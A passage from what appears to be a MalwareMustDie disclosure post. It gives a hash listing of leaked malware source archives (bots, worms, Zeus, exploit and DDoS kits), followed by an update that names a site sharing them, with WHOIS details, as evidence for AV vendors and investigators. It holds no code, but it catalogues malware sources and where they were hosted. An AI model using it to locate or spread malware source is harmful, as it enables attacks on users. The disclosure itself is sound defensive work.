2009/06/12  19:47 cce221fca66c9b9ed96605c9e4c57ff3      36,470 spybot_1.2c.zip
2009/06/12  19:47 80145a460f300a2a70faf397ed66ba2f      91,107 spybot_1.3m.zip
2009/06/12  19:48 c8fb061171652dbb2d518dca7dbe27e9      89,331 spybot_1.4.zip
2009/06/12  19:48 2b183360db6e212a3a6c2836f53137e2      53,537 STEAMBOT-src-2008.rar
2009/06/12  19:48 8dcdeb211ed5077d5dfd85168992ae5b     385,550 Stripped-RXV8.rar
2009/06/12  19:48 5b11513082401b1231e17a4a7777a0c3      22,071 svBot_.rar
2009/06/12  19:48 e7714da35836571a071e83e90115a572      24,742 svbot_activex.rar
2009/06/12  19:48 e05085b6362f3f9cbb9f281c7db08033     313,360 svmail.rar
2009/06/12  19:48 de29ce28b985c781b64357bfd7c4d5c9     180,780 SYM-VNC-NETAP__304_-ASN.rar
2009/06/12  19:48 12a4ccecca84db4909b477468c478594     291,529 TANKBOT 1.0.rar
2009/06/12  19:48 1f0f78be8fe1596680041495783ea08d      37,318 tgspy_nt.zip
2009/06/12  19:48 ad19cf692eb1dd180b12ad546e5e75c9   1,479,024 TsGh_Bot_v3.rar
2009/06/12  19:48 e3c6ead12b4ed521dd2bcfa127b489cf     250,381 uber-wks-asn-m0dded-Pr1v.rar
2009/06/12  19:48 28ccec60a3da99fcb2f3221167c13586      83,202 Unix bot 2.2.5.rar
2009/06/12  19:48 64409a5e2ca611ccc826947654923335     127,945 uNk + USB.zip
2009/06/12  19:48 bd2138b06d33df22e83ffda0bc210f71     203,100 URX-pnp-asn.rar
2009/06/12  19:48 eb14beaa111df581ff7b4a30e3b9fdfd     176,144 Urx.SYM+ASN.rar
2009/06/12  19:48 620bd3c7138c838140ad0cb9aaa760e9     253,664 Urxbot.pRiV-sKull.MoD-ASN_FTP_WORKING.rar
2009/06/12  19:48 a3d68eeff0dc4ee2c58a090c49464685      25,987 vbbot.zip
2009/06/12  19:48 a8f635399ab05d197237e5c6c452ba1b      49,639 vBot.rar
2009/06/12  19:49 164f47d80a5f4b2b103e633c9e69b32a     701,859 VNCscanner.rar
2009/06/12  19:48 89da2d3dbe384977dce0503c10ba5a39     250,208 VrX-5_Priv8_-Msn-Yahoo-TIM-EXPLS-DDOS-116kb.rar
2009/06/12  19:49 376ed869ca322723fabc967628c5769d   2,307,717 w32-netapi-rfi_whit_vnc_exploit.rar
2009/06/12  19:48 9b756f3da73492d2d8de4a48a49bc4cc      19,857 w32ogw0rm.rar
2009/06/12  19:48 9f4841fe9b342352cd3a25590539e8f3       2,355 WarSkype.rar
2009/06/12  19:48 b18e973b610e1838932e88bd53a7891d       8,404 wbot 0.2.rar
2009/06/12  19:48 b91d2846e9fb0d5a2ff50b942fdf48cf       7,426 Win32.Anthrax.rar
2009/06/12  19:49 31ee869f37d73652213352f4631af52e      11,143 Win32.Divinorum.rar
2009/06/12  19:49 1f951ab7c0fb0c5b85e069b1be4bb262       6,439 Win32.Fga.rar
2009/06/12  19:49 5fb72a96da34703e3acc1ee513f36552       8,487 Win32.FridaySectoriate.rar
2009/06/12  19:49 b3ff0098ce3eb257e0af4441541ecac4       7,781 Win32.Harulf.rar
2009/06/12  19:49 459b78d94185943b9ffb2cf108559d6a      42,327 Win32.Mimail.rar
2009/06/12  19:49 e5d1585c450930ca2400b73a915b3fda       3,421 Win32.MiniPig.rar
2009/06/12  19:49 8ff7fc0dc36db3e06be09f3ca560a838      12,875 Win32.Relock.rar
2009/06/12  19:49 8abeded32cc32bb29df9dda9c52ec398       3,172 Win32.Whore.rar
2009/06/12  19:49 502c68a0e3b0a25556a1b3c7dfc798cf      54,804 wisdom.zip
2009/06/12  19:49 a6a25a6801eeb505592dbcdd22701318   2,856,262 wisdom3.rar
2009/06/12  19:49 403b57447d83c96fb4bc17856cec80b2      56,133 wisdom_phr0st_modd.zip
2009/06/12  19:49 bcf4d44ec3550604560b179b481d47dd     151,716 Wiseg3ck0-AIM-DDOS-.rar
2009/06/12  19:50 f536b52db492b1fdb8e63835ccadc19a   1,337,728 woodworm2.rar
2009/06/12  19:49 a2c135f08c7d3dd9a10207c0b8afb9ba     233,121 X0R-USB-By-Virus.rar
2009/06/12  19:49 df8d52c0d08e277cc43c472dca2ed8cb      42,667 xerion2.5.rar
2009/06/12  19:49 7489acc9b17505f0074f103edb49e6ac       7,498 XfireSpread.rar
2009/06/12  19:49 4aa1b4f3f83e470d14b38d05d426fdb0      53,167 xTBot.0.0.2-priv.rar
2009/06/12  19:50 9cffdfa96d91e497b1d0f14fb055cdd5     473,901 ya.bot.rar
2009/06/12  19:50 866681ae3248b68aea0f1e1598386b5c   1,126,175 Zeus 1.1.0.0.rar
2009/06/12  19:50 75efc4a3c87ba1e7f8b743de36718132     358,075 zunker.rar
------------------------------------------------------------------------------------------------------------------
Your incomplete/un-clear request for sample will be answered as follows, please state your identity well:

[Additional Tue Jun 4 00:40:22 JST 2013] Our other member found the similar source codes shared openly via HTTP in the below site hosted in Sweden after the finding of the torrent source described above, suspected as the same owner or the individual who grabbed the same torrent source we found before deletion. Noted: the torrent we found was up & alive for a while before we found it. There is no need for us to hide these information, so we expose it too as per below, for the evidence and further legal investigation purpose:

database,th3-0utl4ws,com/index.php
contact: facebook.com/0uTl4wS
Date: Mon, 03 Jun 2013 15:36:49 GMT
Server: Apache/2.2.23 (CentOS)
X-Powered-By: PHP/5.2.17
With the domains details:
Domain Name: TH3-0UTL4WS.COM
   Registrar: INTERNET.BS CORP.
   Whois Server: whois.internet.bs
   Referral URL: http://www.internet.bs
   Name Server: NS1.TH3-0UTL4WS.COM
   Name Server: NS2.TH3-0UTL4WS.COM
   Status: clientTransferProhibited
   Updated Date: 02-may-2013
   Creation Date: 03-may-2009
   Expiration Date: 03-may-2014

Registrant:
    Fundacion Private Whois
    Domain Administrator
    Email:ialif564f82375a6bc36@t02cduv4f7f99a255f64.privatewhois.net
    Attn: th3-0utl4ws.com
    Aptds. 0850-00056
    Zona 15 Panama
    Panama
    Tel: +507.65995877
After the torrent data we found the similar share of these evil codes on several blackhat sites was popping up here and there too with the changes in archives (with passworded) and some additional malicious changes (mostly backdoored) in some source codes, which was one main reason we should start to right share fir these information properly to the AV companies, authority and trusted researchers. We checked the source before sharing, the originality can be confirmed by the hash listed above.

#MalwareMustDie, NPO.